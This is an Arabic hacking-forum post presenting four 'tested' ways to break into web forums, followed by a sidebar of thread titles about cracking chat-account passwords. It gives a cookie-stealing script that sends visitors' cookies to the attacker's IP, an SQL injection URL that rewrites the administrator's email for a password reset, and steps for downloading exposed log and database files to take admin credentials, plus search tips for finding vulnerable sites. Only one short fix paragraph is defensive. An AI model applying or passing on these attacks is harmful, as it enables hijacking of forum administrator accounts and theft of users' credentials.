طرق اختراق المنتديات مجربه وفعاله
صفحة 1 من اصل 1
طرق اختراق المنتديات مجربه وفعاله
السلام عليكم اليوم جبتلكم طرق عده لاختراق المنتديات نبدأ باسم الله ::.
طرق اختراق المنتديات مجربه وفعاله
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
********>********.write('<img
src="http://my_ip_address/'+********.****ie+'">';***********
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f
8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة ********> فاذا وضعت <img> او ********* او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
إختراق منتديات VP
======================================
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH ERE+username='ADMIN'').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ******* .
8. ثم ترجع لصفحة المنتدى الرئيسية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
======================================
إختراق منتديات xmb
======================================
تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل..
وصف للثغره::
وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر
الأصدار المصاب:::
XMB 1.6 Magic Lantern Final
الشرح والتطبيق:::
جا وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل:
1- عليك بالذهاب الى موقع جوجل [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
index_log.log يعني راح يكون زي كده
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك زي
كده مثلا::
xmbuser=admin
واباس راح تلقاه قدامه زي كده
xmbpw=1faeb6747a31c854800ddf3c62b1717a
8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
======================================
إختراق منتديات Web Wiz Guide
======================================
مثال:[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بسم الله الرحمن الرحيم
السلام عليكم
الشرح: ثغرة تصيب منتديات Web Wiz Guide
أولا إذهب إلى google
اكتب
Web Wiz forum
وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum
admin/wwforum.mdb
حمل الملف وادخل عليه عن طريق microsoft office access
بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin
سجل اسمك والباسوورد
الآن أنت في لوحة التحكم
اتمنى ان يكون الموضوع قد افادكم مع تحياتي لكم
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى
الثلاثاء ديسمبر 24, 2013 3:13 pm من طرف pdhk
» برنامج Check Password لتهكير وسرقة نكات ميج33
الثلاثاء نوفمبر 05, 2013 10:51 am من طرف alnmr
» البرنامج الرائع syriasun برنامج جديد بميزات رائعة
الجمعة مايو 17, 2013 7:36 pm من طرف vip
» برنامج تهكير نكات عن طريق التجريب السريع
الجمعة مايو 10, 2013 5:20 pm من طرف Moaala
» امتلك بوت بفوت 6 رومات مجانا عن طريق كمبيوترك
الخميس مايو 09, 2013 5:57 am من طرف jsmart.eu
» برنامج هكر نكات ميغ33 وتجريب اكثر من 60000 باسوورد
الأحد أبريل 07, 2013 8:48 pm من طرف خليلو
» ملفات بوت عربي جديد بلا منافسة arabic bot
الأحد يناير 27, 2013 9:27 am من طرف vip
» سرفر بوتات مجاني جديد تفضلو شبيه بالمأجور
الأحد يناير 27, 2013 9:18 am من طرف vip
» اصنع بوت خاص بك وبيدخل روم واحد
الخميس يناير 17, 2013 6:45 am من طرف al-cont
» برنامج كشف ارقام النكات السورية مجانا
الأربعاء نوفمبر 14, 2012 10:01 am من طرف the-save
» حصريا ادخل وفعل بروكسي خاص فيك متل المأجور بس مجاني
الجمعة أكتوبر 26, 2012 9:26 am من طرف alnemer5
» اسرار الهكر للسيرياتوك والجابر
الخميس سبتمبر 27, 2012 2:25 am من طرف sam...
» شروط وقوانين الاشراف في المنتديات والاقسام ادخلوا لتنضمو لاسرة المنتدى
الإثنين أغسطس 27, 2012 10:41 am من طرف vip
» شرح برنامج رفع بوتات البايثون
الإثنين أغسطس 27, 2012 9:51 am من طرف vip
» ثغرة حلووووه وسهلة لحقو حالكن .., امتداد ملف passwd.txt
الإثنين أغسطس 20, 2012 6:20 pm من طرف sare-soft